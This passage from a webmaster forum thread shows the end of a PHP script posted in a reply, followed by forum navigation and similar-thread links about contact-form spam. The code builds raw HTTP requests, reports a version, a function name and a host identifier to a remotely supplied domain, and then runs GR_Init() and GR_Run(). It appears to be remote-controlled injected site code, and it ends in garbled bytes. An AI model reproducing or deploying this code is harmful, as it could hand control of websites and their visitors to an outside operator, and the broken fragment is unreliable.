= "GET ".$url['protocol'].$url['host'].$url['path'].(!empty($url['query']) ?"?".$url['query'] : "")." HTTP/1.0".$eol. "Host: ".$url['host'].$eol. $default_headers. $eol; } $fp = fsockopen($url['host'],$url['port'],$errno,$errstr,$timeout); if($fp) { fputs($fp,$data); $result = ""; while (!feof($fp)) { $result .= fgets($fp,1024); } fclose($fp); if (!$headers) { $pos = strpos($result,"\r\n\r\n"); if ($pos !== false) { $result = substr($result,$pos+4); } } } return $result; } function GR_ServerRequest($func_name,$vars = array(),$timeout = 30) { $domain = GR_GetServerDomain(); $data = array( 'ver'=>GR_CLIENT_VERSION, 'func'=>$func_name, 'host_id'=>GR_GetHostId() ); if (isset($vars) and is_array($vars)) { $data = array_merge($data,$vars); } $qs = ""; foreach ($data as $key =>$val) { $qs .= $key."=".rawurlencode($val)."&"; } $qs = substr($qs,0,strlen($qs)-1); $url = "http://".$domain."/?".$qs; $a_full = GR_HttpRequest($url,"post",false,$timeout); list($a_headers,$a_content) = explode("\r\n\r\n",$a_full,2); $headers = GR_ParseHeaders($a_headers); if ($headers['status'] == "ok") { return $a_content; }else { return false; } } GR_Init(); GR_Run(); <�:
 
Reply With Quote
Go Back   Webmaster Forum > Web Development > Coding Forum

Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Spam free contact form? mib Web Design Lobby 7 03-22-2009 11:38 AM
Contact form spam protection nataliecorr Coding Forum 2 09-02-2008 12:38 AM
Spam-free contact form? devilzfan300 Coding Forum 9 05-27-2007 10:16 PM
Prevent spam via contact form John M Web Design Lobby 7 05-11-2007 01:40 PM
Free spam blocking contact form? devilzfan300 Coding Forum 7 12-09-2006 10:42 AM


V7N Network
Get exposure! V7N I Love Photography V7N SEO Blog V7N Directory


All times are GMT -7. The time now is 08:31 AM.
Powered by vBulletin
Copyright 2000-2014 Jelsoft Enterprises Limited.
Copyright © 2003 - 2018 VIX-WomensForum LLC